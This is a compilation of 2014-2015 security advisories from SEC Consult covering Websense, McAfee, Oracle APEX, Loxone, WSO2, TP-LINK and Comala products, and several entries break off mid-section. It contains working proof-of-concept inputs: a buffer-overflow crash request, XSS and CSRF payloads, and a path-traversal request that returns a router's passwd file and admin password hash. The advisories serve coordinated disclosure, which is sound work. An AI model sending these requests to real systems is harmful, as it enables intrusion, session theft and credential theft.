Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web proxy and cache that provides real-time content scanning and Web site classification to protect network computers from malicious Web content while controlling employee access to dynamic, user-generated Web 2.0 content. Web content has evolved from a static information source to a sophisticated platform for 2-way communications, which can be a valuable productivity tool when adequately secured.

URL: http://www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx

Business recommendation:
---
Attackers are able to completely compromise the Websense Content Manager with combined targeted attack vectors. The scope of the test, where the vulnerabilities have been identified, was a very short crash-test of the application. It is assumed that further vulnerabilities exist within this product.

Vulnerability overview/description:
---
A stack-based buffer overflow was identified in the Websense Content Manager administrative interface, which allows writing past the 512-byte buffer "dest" when calling strcpy in handle_debug_network. The vulnerability can be used in combination with a CSRF attack to crash the system or execute arbitrary code.

Proof of concept:
---
A single HTTP request is sufficient to crash the content_manager binary application:

POST /submit_net_debug.cgi?mode=0&menu=0&item=4&tab=1 HTTP/1.1
Host: <content gateway>:8081
[...]
Content-Length: 869

record_version=10479%3A70&submit_from_page=%2Fmonitor%2Fm_net_debug.ink&cmd_name=1&cmd_param=[Ax2048]&cmd_status=0&troute_install=0&tdump_install=0&cmd_action=1&cate=ping&cate=asd&apply=apply

Below is the GDB output of the process memory; most of the CPU's registers, including the stack pointers of various previous frames, are overwritten with the value 'A'.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f122b073700 (LWP 50174)]
0x006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>, arg=<value optimized out>) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
997     /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such file or directory.
        in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc
(gdb) i r
rax            0x0                  0
rbx            0x4141414141414141   4702111234474983745
rcx            0x125c0              75200
rdx            0xda3f               55871
rsi            0x3541360            55841632
rdi            0x1                  1
rbp            0x4141414141414141   0x4141414141414141
rsp            0x7f122b070618       0x7f122b070618
r8             0x4141414141414141   4702111234474983745
r9             0x4141414141414141   4702111234474983745
r10            0x4141414141414141   4702111234474983745
r11            0x3f2c35a350         271324652368
r12            0x4141414141414141   4702111234474983745
r13            0x4141414141414141   4702111234474983745
r14            0x4141414141414141   4702111234474983745
r15            0x4141414141414141   4702111234474983745
rip            0x6becb1             0x6becb1 <handle_debug_network(WebHttpContext*, char const*, char*)+561>
eflags         0x10206              [ PF IF RF ]
cs             0x33                 51
ss             0x2b                 43
ds             0x0                  0
es             0x0                  0
fs             0x0                  0
gs             0x0                  0
(gdb) bt
#0  0x006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>, arg=<value optimized out>) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
#1  0x4141414141414141 in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x4141414141414141 in ?? ()
#4  0x4141414141414141 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141
SEC Consult SA-20150728-0 :: McAfee Application Control Multiple Vulnerabilities
SEC Consult Vulnerability Lab Security Advisory 20150728-0
===
              title: McAfee Application Control Multiple Vulnerabilities
            product: McAfee Application Control
 vulnerable version: verified in version 6.1.3.353
      fixed version: a fixed version is currently not available
             impact: high
           homepage: www.mcafee.com/us/products/application-control.aspx
              found: 28.04.2015
                 by: R. Freingruber (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
===

Vendor description:
---
McAfee Application Control software provides an effective way to block unauthorized applications and code on servers, corporate desktops, and fixed-function devices. This centrally managed whitelisting solution uses a dynamic trust model and innovative security features that thwart advanced persistent threats — without requiring signature updates or labor-intensive list management.

Source: http://www.mcafee.com/us/products/application-control.aspx

Business recommendation:
---
By combining the vulnerabilities documented in this advisory an attacker can completely bypass the mitigations provided by McAfee Application Control. This especially includes the application whitelisting as well as the read and write protections. Moreover, an attacker can attack the availability of the system.

SEC Consult recommends not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
---
1) Injected library bypasses protections of the operating system
To add memory corruption protections (mp, mp-casp, mp-vasr, mp-vasr-forced-relocation) McAfee Application Control injects its own library scinject.dll into all running processes. The library allocates a writable and executable memory region which can be used to bypass the mitigation technique Data Execution Protection (DEP) of the underlying operating system. Moreover, it can also be used to bypass the mitigation technique mp-casp from McAfee Application Control. This increases the likelihood of successfully exploiting a memory corruption vulnerability. Since memory corruption vulnerabilities can be used to compromise a system and to bypass the application whitelisting protection, it is very important not to decrease the security of the protections provided by the operating system.

2) Software shipped with an application from 1999 which includes publicly known vulnerabilities
McAfee Application Control installs by default a ZIP application from 1999. The ZIP application contains publicly known vulnerabilities including a buffer overflow. An attacker can exploit the buffer overflow vulnerability to bypass application whitelisting. However, a public exploit is not available and exploitation of the vulnerability is considered not trivial.

3) Multiple kernel driver vulnerabilities
An attacker can send manipulated IOCTL requests to the kernel which lead to a system crash. These vulnerabilities can be used to affect the availability of the system. It is expected that these vulnerabilities can also be used to escalate privileges to kernel level.

4) Insufficient application whitelisting protection
The main feature of McAfee Application Control is application whitelisting. SEC Consult Vulnerability Lab discovered multiple ways to bypass this protection.

5) Insufficient file system read-/write-protection
Because of the design of McAfee Application Control, write protection is mandatory to ensure the security of application whitelisting. SEC Consult managed to bypass the write protection to overwrite whitelisted applications to achieve full code execution. Moreover, read protection was bypassed to dump the contents of McAfee's password file. By bypassing write protection it is also possible to delete the password file to interact with McAfee Application Control without requiring a password. This can be used to completely disable McAfee Application Control.

Proof of concept:
---
Since no fix is available for any of the described vulnerabilities, the proof of concept section was completely removed from the advisory.

Vulnerable / tested versions:
---
The version 6.1.3.353 was found to be vulnerable. This was the latest version at the time of discovery.

Vendor contact timeline:
---
2015-06-03: Contacting vendor through security-ale...@mcafee.com
SEC Consult SA-20150716-0 :: Permanent Cross-Site Scripting in Oracle Application Express
SEC Consult Vulnerability Lab Security Advisory 20150716-0
===
              title: Permanent Cross-Site Scripting
            product: Oracle Application Express
 vulnerable version: All versions prior to 4.2.3.00.08
      fixed version: 4.2.3.00.08
         CVE number: CVE-2015-2655
             impact: high
           homepage: https://apex.oracle.com/i/index.html
              found: 2014-05-28
                 by: F. Lukavsky
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
===

Vendor description:
---
Oracle Application Express (Oracle APEX) is Oracle's primary tool for developing Web applications with SQL and PL/SQL. Using only a web browser, you can develop and deploy professional Web-based applications for desktops and mobile devices. It is a fully supported, no cost option of the Oracle Database, and is installed by default in all editions of the Oracle Database. Even those without SQL and PL/SQL knowledge, can still easily install the many built-in packaged applications, such as Survey Builder, Customer Tracker, and P-Track (for tracking projects).

http://www.oracle.com/technetwork/developer-tools/apex/overview/index.html

Vulnerability overview/description:
---
The gReport Controls Sort Widget is prone to permanent Cross-Site Scripting. The "display as" setting of the column attributes is ignored for the filter list.

Proof of concept:
---
Adding the following field to a table will cause an alertbox to display the currently set cookies as soon as the sort options are selected for the column:

xss-entry<img src=x onerror=alert(document.cookie)>

Vulnerable / tested versions:
---
All versions prior to 4.2.3.00.08

Vendor contact timeline:
---
2014-08-13: Contacting vendor through secalert...@oracle.com
2014-08-14: Vendor response - vulnerability will be investigated
2014-08-15: Vendor response - issue will be tracked as S0484336
2014-08-22: Status update: Under investigation / Being fixed in main codeline
2014-09-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2014-10-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2014-11-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2014-12-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-01-24: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-02-25: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-03-25: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-04-25: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-05-23: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-06-25: Status update: Issue fixed in main codeline, scheduled for a future CPU
2015-07-11: Issue is fixed in upcoming CPU, patches will be released on 2015-07-14
2015-07-16: Coordinated release of the security advisory

Solution:
---
Upgrade to Oracle Application Express 4.2.3.00.08.

Workaround:
---
Refrain from using the gReport Controls Sort Widget.

Advisory URL:
---
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
SEC Consult SA-20150514-0 :: Multiple vulnerabilities in Loxone Smart Home (part 2)
SEC Consult Vulnerability Lab Security Advisory 20150514-0
===
              title: Multiple vulnerabilities
            product: Loxone Smart Home
 vulnerable version: Firmware version 6.4.5.12
      fixed version: 6.4.5.12
             impact: Critical
           homepage: http://www.loxone.com
              found: 2015-03-12
                 by: Johannes Greil (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
===

Vendor product description:
---
Loxone Electronics was founded in 2009. Our focus is the development and production of control solutions for all homes. Our aim is to make home automation interesting, affordable and accessible for everyone.

URL: http://www.loxone.com/enus/company/about-us.html

Business recommendation:
---
Most of the issues previously identified (see SEC Consult security advisory SA-20150227-0) seem not to have been fixed properly and are still exploitable, either directly or by easily bypassing the implemented measures. A very short crash-test of only a few hours even resulted in new vulnerabilities.

The Loxone smart home has multiple design and implementation flaws which combined could be used by an attacker to:
1) remotely cause a denial of service condition which renders the smart home unusable, which would effectively disable any Loxone-controlled alarm system,
2) steal the user's credentials for the management interface and fully control the smart home,
3) execute JavaScript code in the user's browser for further attacks,
4) control arbitrary devices connected to the system, e.g. switch on/off lights, remotely open doors or garages, disable the alarm system, etc.,
5) gain access to admin passwords of Loxone partners (e.g. electricians who are implementing the smart home solution at customers) and completely take over other smart homes of the same Loxone partner!

It is recommended by SEC Consult not to use this smart home system until a thorough security analysis (white box) of all components has been performed by security professionals, as a very short crash test (black box) already resulted in critical vulnerabilities.

Vulnerability overview/description:
---
1) Cross-site request forgery (XSRF)
The system is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link, or by embedding such a link within web pages (e.g. discussion forums), he could control arbitrary functions within the smart home system. All functions can be controlled via web based commands, e.g. in order to switch on lights, remotely open doors or garages, disable the alarm system, etc.

This can still be exploited in the current Loxone version and it does not seem to be fixed properly.

2) HTTP Response Splitting / Header injection
The web server of the Loxone smart home system is vulnerable to HTTP response splitting attacks. If an attacker is able to lure a user into clicking a crafted link (e.g. just by clicking a URL in a discussion forum or phishing email) he could arbitrarily manipulate the server's response (e.g. injection of JavaScript code).

This can still be exploited in the current Loxone version and it does not seem to be fixed properly. The implemented measures/filters can be easily bypassed using double-encoded payloads. This attack is not limited to the admin interface; it can be exploited in any path of the webserver.

SEC Consult has verified this attack in the most current versions of Mozilla Firefox and Google Chrome web browsers.

3) Reflected cross-site scripting (XSS) vulnerability
The web interface of Loxone smart home is vulnerable to reflected cross-site scripting attacks. If an attacker is able to lure a user into clicking a crafted link (e.g. just by clicking a URL in a discussion forum or phishing email) he could execute arbitrary JavaScript code in the user's browser. Thereby he could steal the user's credentials or control arbitrary devices within the smart home system.

To exploit this vulnerability it is not mandatory for the user to be authenticated. Unauthenticated XSS vulnerabilities exist (by exploiting the HTTP Response Splitting vulnerability described in 2) as well as authenticated ones.

SEC Consult has verified this attack in the most current versions of Mozilla Firefox and Google Chrome web browsers.

4) Denial of service
An attacker could perform a denial of service attack with simple measures, such as SYN flood attacks. During such an attack the system isn't accessible via the network and can't be controlled
SEC Consult SA-20150513-0 :: Multiple critical vulnerabilities in WSO2 Identity Server
SEC Consult Vulnerability Lab Security Advisory 20150513-0
===
              title: Multiple critical vulnerabilities
            product: WSO2 Identity Server
                     other WSO2 Carbon based products may be affected too
 vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)
      fixed version: 5.0.0 with patches 1194 and 1095 applied
         CVE number:
             impact: critical
           homepage: http://wso2.com/products/identity-server/
              found: 2015-02-19
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
===

Vendor description:
---
WSO2 Identity Server provides sophisticated security and identity management of enterprise web applications, services, and APIs, and makes life easier for developers and architects with its hassle-free, minimal monitoring and maintenance requirements. In its latest version, Identity Server acts as an Enterprise Identity Bus (EIB) — a central backbone to connect and manage multiple identities regardless of the standards on which they are based.

URL: http://wso2.com/products/identity-server/

Business recommendation:
---
The WSO2 Identity Server has three security vulnerabilities that allow an attacker to take over administrative user sessions and read arbitrary local files. Moreover, the XXE vulnerability potentially allows an attacker to conduct further attacks on internal servers, since the vulnerability may allow an attacker to bypass firewall rules.

SEC Consult only conducted a very quick and narrow check on the WSO2 Identity Server. Since in this check a critical vulnerability was found, SEC Consult suspects that the Identity Server contains even more critical vulnerabilities. Since other WSO2 products are based on the same framework (WSO2 Carbon Framework), it is possible that these or similar vulnerabilities affect other products too.

SEC Consult recommends to not use any products based on the WSO2 Carbon Framework until a thorough security review has been conducted.

Vulnerability overview/description:
---
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
The WSO2 Identity Server is vulnerable to reflected cross-site scripting vulnerabilities. An attacker can lure a victim who is logged in on the Identity Server administration web interface to e.g. click on a link and take over the victim's session.

2) Cross-site request forgery (CSRF, IDENTITY-3280)
On at least one web page, CSRF protection has not been implemented. An attacker on the internet could lure a victim who is logged in on the Identity Server administration web interface to a web page e.g. containing a manipulated img tag. The attacker is then able to add arbitrary users to the Identity Server.

3) XML external entity injection (XXE, IDENTITY-3192)
An unauthenticated attacker can use the SAML authentication interface to inject arbitrary external XML entities. This allows an attacker to read arbitrary local files. Moreover, since the XML entity resolver allows remote URLs, this vulnerability may allow to bypass firewall rules and conduct further attacks on internal hosts.

Proof of concept:
---
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
When opening the following URL an alert-box is shown as an example:

http://host:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

When a user without permission to create other users issues the following request, an alert-box is shown:

--- snip ---
POST /carbon/user/add-finish.jsp HTTP/1.1
Host: host:9443
Cookie: cookies
Content-Type: application/x-www-form-urlencoded
Content-Length: 261

pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123
--- snip ---

2) Cross-site request forgery (CSRF, IDENTITY-3280)
The following HTML fragment demonstrates this issue:

--- snip ---
<form method="POST" action="https://host:9443/carbon/user/add-finish.jsp">
<input type="text" name="domain" value="PRIMARY"/>
<input type="text" name="username" value="secconsult"/>
<input type="text" name="password" value="test123"/>
<input type="submit"/>
</form>
--- snip ---

3) XML external entity injection (XXE, IDENTITY-3192)
After issuing the following request to a vulnerable Windows server
SEC Consult SA-20150410-0 :: Unauthenticated Local File Disclosure in multiple TP-LINK products (CVE-2015-3035)
SEC Consult Vulnerability Lab Security Advisory 20150410-0
===
              title: Unauthenticated Local File Disclosure
            product: Multiple TP-LINK products (see "Vulnerable / tested versions")
 vulnerable version: Multiple (see "Vulnerable / tested versions")
      fixed version: see "Solution"
         CVE number: CVE-2015-3035
             impact: Critical
           homepage: http://tp-link.com
              found: 2015-02-19
                 by: Stefan Viehböck (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
===

Vendor description:
---
TP-LINK is a global provider of SOHO & SMB networking products and the World's No.1 provider of WLAN products, with products available in over 120 countries to tens of millions customers. Committed to intensive R&D, efficient production and strict quality management, TP-LINK continues to provide award-winning networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline Adapters, Print Servers, Media Converters and Network Adapters for Global end-users.

Source: http://www.tp-link.us/about/?categoryid=102

Business recommendation:
---
Attackers can read sensitive configuration files without prior authentication. These files e.g. include the administrator credentials and the WPA passphrase.

TP-LINK has provided fixed firmware which should be installed immediately.

Vulnerability overview/description:
---
Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.

Proof of concept:
---
The following HTTP request shows how directory traversal can be used to gain access to files without prior authentication:

===
GET /login/../../../etc/passwd HTTP/1.1
Host: $host
===

The server response includes the contents of the file:

===
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive: Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 683
Content-Type: text/html

root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
admin:x:500:500:admin:/home:/bin/sh
guest:x:500:500:guest:/home:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
===

Several sensitive files can be read. These include:

Files containing the Wi-Fi configuration including the WPA passphrase:
/login/../../../tmp/ath.ap_bss
/login/../../../tmp/ath1.ap_bss

A file containing administrator credentials (format: $user:md5($password)), which can be brute-forced very efficiently:
/login/../../../tmp/dropbear/dropbearpwd

Example server response:

===
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive: Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 56
Content-Type: text/html

username:admin
password:11d0fc2ff3e7862d8a3f9b280e6d390c
===

Vulnerable / tested versions:
---
The vulnerability affects the following products:
TP-LINK Archer C5 (Hardware version 1.2)
TP-LINK Archer C7 (Hardware version 2.0)
TP-LINK Archer C8 (Hardware version 1.0)
TP-LINK Archer C9 (Hardware version 1.0)
TP-LINK TL-WDR3500 (Hardware version 1.0)
TP-LINK TL-WDR3600 (Hardware version 1.0)
TP-LINK TL-WDR4300 (Hardware version 1.0)
TP-LINK TL-WR740N (Hardware version 5.0)
TP-LINK TL-WR741ND (Hardware version 5.0)
TP-LINK TL-WR841N (Hardware version 9.0)
TP-LINK TL-WR841N (Hardware version 10.0)
TP-LINK TL-WR841ND (Hardware version 9.0)
TP-LINK TL-WR841ND (Hardware version 10.0)

Vendor contact timeline:
---
2015-02-19
SEC Consult SA-20150409-0 :: Multiple XSS XSRF vulnerabilities in Comalatech Comala Workflows
SEC Consult Vulnerability Lab Security Advisory < 20150409-0 >
===============================================================
              title: Multiple XSS & XSRF vulnerabilities
            product: Comalatech Comala Workflows
 vulnerable version: <= 4.6.1
      fixed version: 4.6.2 for Confluence 5.4+ and 4.5.4 for Confluence 4.3+
             impact: High
           homepage: https://marketplace.atlassian.com/plugins/com.comalatech.workflow
              found: 2015-02-16
                 by: J. Krautwald (Office Berlin)
                     M. Niederwieser (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
===============================================================

Vendor product description:
---------------------------
Build your Confluence content your own way through Comala Workflows approvals,
tasks, notifications and workflows. Set customized workflows to create, review,
approve and publish your content.

- Assign page reviewers
- Create team tasks
- Publish approved content
- Manage your documentation stages

Use Comala Workflows for: Quality Management, Standards Compliance, Technical
Documentation, Editorial Publishing

Source: https://marketplace.atlassian.com/plugins/com.comalatech.workflow

Business recommendation:
------------------------
Comala Workflows suffers from multiple vulnerabilities due to improper input
and output validation. By exploiting these vulnerabilities an attacker could:

1. attack other users of the web application with JavaScript code, browser
   exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.

Vulnerability overview/description:
-----------------------------------
1. Multiple cross-site scripting issues

Comala Workflows suffers from multiple reflected and stored cross-site
scripting vulnerabilities, which allow an attacker to steal other users'
sessions, to impersonate other users and to gain unauthorized access to
documents hosted in the Confluence instance in which the Workflows module is
embedded. Many parameters are not properly sanitized and are therefore
vulnerable to XSS.

2. Cross-site request forgery vulnerabilities

Comala Workflows does not use shared secrets (tokens) to prevent cross-site
request forgery (XSRF) attacks. If an attacker is able to lure a user into
clicking a crafted link, or embeds such a link within web pages (e.g.
discussion forums), he can manipulate data or automatically inject XSS
payloads to attack other users.

Proof of concept:
-----------------
1. Multiple cross-site scripting issues

a) The input parameters for giving a workflow a name, appending a label to a
given workflow, or adding a new task for a given state are not properly
sanitized and are thus susceptible to reflected cross-site scripting. The
affected scripts and their vulnerable GET parameters are:

  Script                  GET Parameter(s)
  ----------------------  -----------------------------
  saveproperties.action   newLabelName, newWorkflowName
  newtask.action          taskName

When editing an existing workflow via the Markup functionality (accessible via
the workflowMarkup POST parameter of
/plugins/approvalsworkflow/saveworkflowmarkup.action), the attachment macro is
also susceptible to reflected cross-site scripting.

b) When editing an existing workflow via the Markup functionality (accessible
via the workflowMarkup POST parameter of
/plugins/approvalsworkflow/saveworkflowmarkup.action), the workflow element
"task" does not sanitize the given input and is thus susceptible to stored
cross-site scripting. The application does not sanitize the input before
printing it to the Page Activity popup, which leads to execution of the
persistently injected script. When such a task is assigned to a co-worker, an
e-mail containing the payload is sent to the assigned person, and the payload
executes when the My Comala Workflow Tasks, Page Activity, or Page Activity
Macro page is opened.

2. Cross-site request forgery vulnerabilities

The /plugins/approvalsworkflow/saveworkflowmarkup.action script for editing an
existing workflow via the Markup functionality, for example, is susceptible to
cross-site request forgery. If an attacker knows a valid project name (key
parameter) and the corresponding workflow name (workflowName parameter), she
can exploit this vulnerability to set the Markup code of the workflow to an
arbitrary value (e.g. an XSS payload via the task element, see 1. b)).

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in versions up to and
including 4.6.1.

Vendor contact timeline:
------------------------
2015-03-17: Contacted vendor through email
2015-03-18: Vendor confirmed
SEC Consult SA-20150227-0 :: Multiple vulnerabilities in Loxone Smart Home
SEC Consult Vulnerability Lab Security Advisory < 20150227-0 >
===============================================================
              title: Multiple vulnerabilities
            product: Loxone Smart Home
 vulnerable version: Firmware: 5.49; Android-App: 3.4.1
      fixed version: 6.3
             impact: High
           homepage: http://www.loxone.com
              found: 2014-07-02
                 by: Daniel Schwarz (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

                     Manuel Deticek, Alexander Inführ, Robert Pölzelbauer
                     FH-St.Pölten - Institut für IT Sicherheitsforschung
                     http://www.fhstp.ac.at
===============================================================

Vendor product description:
---------------------------
"Loxone Electronics was founded in 2008. Our focus is the development and
production of control solutions for all homes. Our aim is to make home
automation interesting, affordable and accessible for everyone."

URL: http://www.loxone.com/enus/company/about-us.html

"The Loxone Smart Home gives the owner full control of every device or task
using a wall switch, phone or smart tablet. Control and automate areas such
as: Lighting, Climate, Security, Audio/Video, Shading, and even Pool and
irrigation systems. Your system will adapt all areas of your home providing
complete smart home automation."

URL: http://www.loxone.com/enus/smart-home/overview.html

Business recommendation:
------------------------
The Loxone Smart Home has multiple design and implementation flaws which could
be used by an attacker to:

1) cause a denial of service,
2) steal the user's credentials,
3) execute JavaScript code in the user's browser or
4) control arbitrary devices connected to the system.

SEC Consult recommends not to use this system until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.

Vulnerability overview/description:
-----------------------------------
1) Unencrypted data transmission

All communication is unencrypted and can therefore be intercepted and
manipulated by a man-in-the-middle attacker. This enables an attacker to
control every device within the smart home system. Furthermore, a plaintext
authentication mechanism is supported, which enables an attacker to steal user
credentials.

2) Missing state-of-the-art HTTP headers

The HTTP headers that are set do not comply with the current state of the art.
No header prevents framing, so it is possible to embed the web interface
within an iframe and misuse it for phishing attacks. Furthermore, no CSP
headers are set to mitigate cross-site scripting attacks.

3) Cross-site request forgery (XSRF)

The system is vulnerable to XSRF attacks. If an attacker is able to lure a user
into clicking a crafted link, or embeds such a link within web pages (e.g.
discussion forums), he can control arbitrary devices within the smart home
system.

4) HTTP response splitting

The backend of the smart home system is vulnerable to HTTP response splitting
attacks. If an attacker is able to lure a user into clicking a crafted link, he
can arbitrarily manipulate the server's response (e.g. inject JavaScript code).

5) Multiple reflected cross-site scripting (XSS) vulnerabilities

The admin web interface of Loxone Smart Home is vulnerable to multiple
reflected cross-site scripting attacks. If an attacker is able to lure a user
into clicking a crafted link, he can execute arbitrary JavaScript code in the
user's browser and thereby steal the user's credentials or control arbitrary
devices within the smart home system. The user does not have to be
authenticated for this to be exploitable: unauthenticated XSS vulnerabilities
(reached by exploiting the HTTP response splitting vulnerability described in
4)) exist alongside authenticated ones.

6) Stored cross-site scripting vulnerability

Besides the reflected XSS vulnerabilities already mentioned, the Loxone Smart
Home system also contains a stored XSS vulnerability. An authenticated attacker
is able to persistently inject JavaScript code into the user web interface.
This code is executed in the context of other users at every login, as well as
when a certain function of the web interface is called. The code can be
injected either via the web interface or through the XSRF vulnerability
already mentioned, so the attacker does not need to log in explicitly. After
circumventing some filtering obstacles, an attacker could for example
automatically disable a connected alarm system every day at midnight.

7) Insecure storage of credentials